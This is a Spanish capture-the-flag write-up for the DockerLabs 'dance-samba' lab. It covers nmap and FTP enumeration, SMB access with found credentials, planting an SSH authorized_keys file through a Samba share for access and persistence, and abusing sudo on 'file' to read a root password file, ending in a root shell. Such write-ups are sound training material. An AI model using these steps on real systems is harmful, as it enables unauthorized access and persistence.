Writeup dockerlabs dance-samba
Primero encendemos la máquina:

Y como siempre empezaremos con la enumeración con NMAP

Podemos ver un FTP y un Samba, vamos primero a por el FTP

Podemos ver que muy seguramente tengamos un usuario que se llama “Macarena” y seguramente use la contraseña “donald”
Vamos a intentar acceder a Samba con esas credenciales, pero primero enumeramos los shares del Samba
nxc smb 172.17.0.2 -u 'macarena' -p 'donald'


Aquí podremos ver el user.txt.
Aquí podremos ver el user.txt.
Pensando en como conseguir acceso a la máquina víctima, podemos ver que en samba hay una carpeta llamada .bash_history, entonces muy seguramente podremos incluir una carpeta .ssh y unas authorized_keys, creando acceso a la máquina con nuestra clave privada y al mismo tiempo persistencia
Así procedo:
Primero generamos unas keys:
ssh-keygen -f id_rsa

cambiamos el nombre de id_rsa.pub a authorized_keys

Iniciamos sesión en el samba víctima y creamos la carpeta .ssh

Subimos nuestro archivo de authorized_keys

e iniciamos sesión:
ssh macarena@172.17.0.2 -i id_rsa
en este momento tocará enumerar la máquina, haciendo la búsqueda de archivos ocultos tipicos, por ejemplo en /opt o /tmp o otros directorios en /home, podemos encontrar esto en /home/secret:

lo pasamos por cyberchef con el recipe “magic”

Así que tenemos la contraseña de macarena, vamos a ver él sudo -l que tiene para este usuario

Durante la enumeración anterior de la máquina víctima pudimos ver en el directorio /opt con un archivo un tanto raro dentro, vamos a revisarlo con sudo y el comando file
sudo -u root /usr/bin/file -f /opt/password.txt

asi que asi terminaria esta maquina:
macarena@441ea389a49f:/opt$ su root
Password:
su: Authentication failure
macarena@441ea389a49f:/opt$ su root
Password:
root@441ea389a49f:/opt# ls
password.txt
root@441ea389a49f:/opt# cd /root
root@441ea389a49f:~# ls
root.txt true_root.txt
root@441ea389a49f:~# cat root.txt
It's not that easy, first root.
root@441ea389a49f:~# cat true_root.txt
efb6984b9b0eb57451aca3f93c8ce6b7
root@441ea389a49f:~#
Muchas gracias por llegar hasta aquí, y si me quieres conocer un poco más; abajo tienes mis enlaces de interés.
¡Saludos!
👋 Sobre el autor
¡Hola! Soy Ghxstsec, un entusiasta de la ciberseguridad y pentester. Me dedico a documentar mi viaje por el complejo mundo de la seguridad ofensiva.
Actualmente, poseo las certificaciones eJPTv2, eCPPTv3 y Google Cybersecurity Professional Certificate. Mi objetivo es intentar ayudar a sobrellevar la brecha entre el aprendizaje teórico y la práctica, al tiempo que comparto mis experiencias sinceras con la comunidad. Cuando no estoy en una maratón de exámenes de 24 horas, me puedes encontrar haciendo ejercicios en Try Hack Me o investigando los últimos artículos sobre ciberseguridad.
✉️ Conéctate conmigo:
LinkedIn: LinkedIn
GitHub: GitHub
Twitter/X: Twitter
Try Hack Me: THM
¡Muchas gracias por leer todo el artículo! ¡Te deseo mucha suerte en tus próximos logros! 😊